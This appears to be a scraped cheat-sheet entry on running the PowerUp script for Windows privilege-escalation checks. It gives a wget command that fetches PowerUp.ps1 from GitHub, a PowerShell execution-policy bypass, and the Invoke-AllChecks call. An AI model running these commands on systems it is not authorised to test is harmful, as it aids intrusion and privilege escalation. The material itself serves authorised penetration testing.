PowerUp
wget https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerUp/PowerUp.ps1CMD> powershell -exec bypass
PS> . .\PowerUp.ps1
PS> Invoke-AllChecks
# Run the Invoke-AllChecks function to start checking for common privilege escalation misconfigurations.Last updated